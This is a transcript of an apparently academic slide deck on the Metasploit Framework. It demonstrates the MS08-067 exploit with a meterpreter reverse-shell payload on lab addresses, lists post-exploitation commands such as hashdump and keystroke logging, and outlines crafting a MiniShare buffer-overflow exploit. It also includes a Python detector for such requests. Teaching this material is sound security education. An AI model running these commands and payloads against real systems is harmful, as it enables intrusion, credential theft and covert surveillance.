Anthony Gabrielson - PowerPoint Presentation

Uploaded On 2016-10-17


Presentation Transcript

Anthony Gabrielson
Adam Helbling

Agenda

Part 1: The Metasploit Framework
- Basics
- Running Metasploit
- The Exploit
- Demo
- More on Exploits

Part 2: From ‘ploit’ to ‘ploit’
- Overview
- Assumptions
- Environment Setup
- Ollydbg Introduction
- Vulnerability Explanation
- Crafting the Exploit
- Metasploit Enablers
- Adding Shellcode

The Metasploit Framework: Basics

- Created in 2003 by HD Moore
- Vitals:
  - BSD License
  - 700K lines of Ruby
  - Currently produced by Rapid 7
  - De facto standard in vulnerability development frameworks
- Commercial alternatives:
  - Rapid 7 has many commercial implementations
  - Immunity's CANVAS
  - Core Impact

The Metasploit Framework: Basics (cont’d)

- Metasploit is a well known anti-forensic and evasion tool
- Modular for ease of development and portability
- msfupdate: get the latest & greatest exploits
- msfconsole: the console, which also works as a command shell
- Exploit automation: db_autopwn
  - Very noisy
  - Requires a database

The Metasploit Framework: Running Metasploit

The Metasploit Framework: The Exploit

ms08_067_netapi (RANK: Great)

This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module; full support for NX bypass on 2003, along with other platforms, is still in development.

This attack can be prevented with the MS08-067 patch.

The Metasploit Framework: Demo

The Metasploit Framework: Demo Walkthrough

msfconsole
use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST 192.168.11.51    [remote host]
set LHOST 192.168.11.53    [local host]
show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.11.51    yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, none, process
   LHOST     192.168.11.53    yes       The listen address
   LPORT     4444             yes       The listen port

exploit

The Metasploit Framework: More about the Exploit

msf exploit(ms08_067_netapi) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows XP SP2 English (NX)
   4   Windows XP SP3 English (NX)
   …
   61  Windows 2003 SP2 Japanese (NO NX)

The Metasploit Framework: Meterpreter Commands

meterpreter > sysinfo
System Language : en_US
OS              : Windows XP (Build 2600, Service Pack 2).
Computer        : AGABRIEL-B90B23
Architecture    : x86
Meterpreter     : x86/win32

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > shell
Process 396 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

More:
- hashdump
- upload
- webcam_snap
- keyscan_{start, stop, dump}
- ps

From ploit to ploit: Overview

…or how to add a generic exploit to your Metasploit arsenal

Q: What can you do with a known vulnerability?
- Craft an exploit, execute it from a command line
- What else?

Metasploit is not perfect, but it has its place.
- Repository
- Framework
- Tools to help build exploits
- Ease of use
- Generic shellcode vs. robust shellcode

Challenges:
- Crafting the exploit
- Reuse of an exploit

From ploit to ploit: Assumptions

Already spent resources (time, money, etc.) to discover a vulnerability via one (or all) of the following:
- Fuzzing
- Static disassembly
- Review of source code
- Known vulnerability
  - CVE (found on http://cve.mitre.org/)
  - Security Advisory (http://secunia.com/advisories)
- Known exploit
  - Exploit DB (http://www.exploit-db.com/exploits)

From ploit to ploit: Environment Setup

- Vulnerability: MiniShare HTTP “GET” Request Buffer Overflow Vulnerability
- Exploit: MiniShare Remote Buffer Overflow Exploit (C source)
- Windows XP SP2 (or really any XP version)
- MiniShare 1.4.1
- Ollydbg 1.10
- Backtrack 4
  - Metasploit
  - Python
  - Netcat

From ploit to ploit: Ollydbg Introduction

- Main Pane: CPU instructions (Microsoft Assembler format)
- Memory Pane: current section of memory where the code is executing
- Registers Pane:
  - EIP: address of the next instruction to be executed
  - ESP: stack pointer
- Stack Pane: shows the entries on the stack

From ploit to ploit: Vulnerability Explanation

HTTP GET with a large (>1787 bytes) request:

GET [a string of >1787 bytes] HTTP/1.1\r\n\r\n

- EIP = 0x41414141
- Access violation when reading [41414141]
- EIP points to the address containing the next instruction, but 0x41414141 throws an access violation.
- ESP = the address of the buffer that was overflowed.
- Note the “AAAAAAAAAAAAAAAAAA……AAAA”
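As an added example (not part of the original slides), here is a small Python check of the kind a defender would run over proxy or web-server captures: it parses each HTTP request line and flags request targets longer than the 1787-byte threshold the slide names, targets containing bytes a URL path never carries, and long runs of one repeated byte like the “AAAA…” above. The threshold constant and the sample requests are assumptions constructed for the example.

```python
import string

# Threshold taken from the slide: a request target longer than this
# overflowed MiniShare 1.4.1. Tune per application; 1787 is not universal.
MAX_TARGET_LEN = 1787
# Characters a URL path legitimately contains (no control characters).
PRINTABLE = set(string.printable) - set("\r\n\t\x0b\x0c")


def parse_request_line(raw: bytes):
    """Return (method, target, version) or None if the line is malformed."""
    parts = raw.split(b"\r\n", 1)[0].split(b" ")
    if len(parts) != 3 or not parts[2].startswith(b"HTTP/"):
        return None
    return parts[0], parts[1], parts[2]


def longest_run(data: bytes) -> int:
    """Length of the longest run of one repeated byte (the slide's AAAA...)."""
    best = run = 0
    prev = None
    for b in data:
        run = run + 1 if b == prev else 1
        prev = b
        best = max(best, run)
    return best


def classify_request(raw: bytes, max_len: int = MAX_TARGET_LEN) -> list:
    """Return a list of findings; an empty list means the request looks benign."""
    parsed = parse_request_line(raw)
    if parsed is None:
        return ["malformed-request-line"]
    _method, target, _version = parsed
    findings = []
    if len(target) > max_len:
        findings.append(f"oversized-target:{len(target)}")
    # Shellcode and NOP sleds contain bytes a URL path never does.
    if any(ch not in PRINTABLE for ch in target.decode("latin-1")):
        findings.append("non-printable-bytes-in-target")
    run = longest_run(target)
    if run >= 64:
        findings.append(f"repeated-byte-run:{run}")
    return findings


# Constructed sample requests for the example (not captured traffic).
SAMPLES = {
    "benign": b"GET /index.html HTTP/1.1\r\nHost: fileserver\r\n\r\n",
    "overflow": b"GET /" + b"A" * 1800 + b" HTTP/1.1\r\n\r\n",
    "nop_sled": b"GET /" + b"\x90" * 16 + b"zz HTTP/1.1\r\n\r\n",
}
```

Calling classify_request on each entry of SAMPLES gives an empty list for the benign request and one or more findings for the other two.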

From ploit to ploit: Crafting the Exploit

This approach is different than the lab exercise assigned.
- We are not overwriting the stack’s return address here.
- Instead, let’s find an instruction in the code to transfer our execution to: \xFF\xE4 = JMP ESP (jump to the address stored in ESP).
- Overwrite EIP with the address of a JMP ESP instruction.
- More robust to some degree, because we will pick an address that is predictable and will work across more systems.
- In Win XP SP2 there is no randomization of the base location where DLLs are loaded, therefore if we choose a DLL it will work on each system that loads this DLL.
- The best choice would be a DLL provided with MiniShare; however, there are none, so we revert to using a Windows DLL.

From ploit to ploit: Metasploit Enablers

- /pentest/exploits/framework3/tools/pattern_create.rb
  - Creates a unique pattern of a user-specified length.
  - Useful for understanding the offsets within the buffer where we overwrite.
- /pentest/exploits/framework3/tools/pattern_offset.rb
  - Returns the location where EIP is overwritten and where ESP points to.
  - Finds offsets using the pattern generated by pattern_create.rb
  - EIP overwritten at 1787 bytes into our buffer
  - ESP points to location 1791 bytes into our buffer

From ploit to ploit: Adding Shellcode

- Using msfpayload, which comes with Metasploit, we will create a useful piece of shellcode which creates a reverse shell on a port.
  - What is a reverse shell?
  - Note: does this give us away?!
- C style vs. raw output (‘R’ vs. ‘C’)
- Does anyone see a problem with some of this shellcode?
  - msfencode can help us…
- Let’s add some NOPs to help improve stability.
- Now all that would need to be done is to add this to Metasploit as a Ruby script. (Note: it’s already in there.)

References and Conclusions

- http://grey-corner.blogspot.com/2010/01/beginning-stack-based-buffer-overflow.html
- http://www.offensive-security.com/metasploit-unleashed/
- Metasploitable

This presentation just begins to scratch the surface.

Questions?

The Metasploit Framework: The Exploit (2)

psexec: a light-weight telnet replacement that lets you execute processes on other systems.

This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload. This module is similar to the "psexec" utility provided by SysInternals. This module is now able to clean up after itself. The service created by this tool uses a randomly chosen name and description.

This one has more, list ‘em

The Exploit (3)

ms05_039_pnp: Vulnerability in Plug and Play Could Allow Remote Code Execution and Elevation of Privilege

This module exploits a stack buffer overflow in the Windows Plug and Play service. This vulnerability can be exploited on Windows 2000 without a valid user account. NOTE: Since the PnP service runs inside the services.exe process, a failed exploit attempt will cause the system to automatically reboot.

Affected Systems: Win2k SP4, Win XP SP2, etc…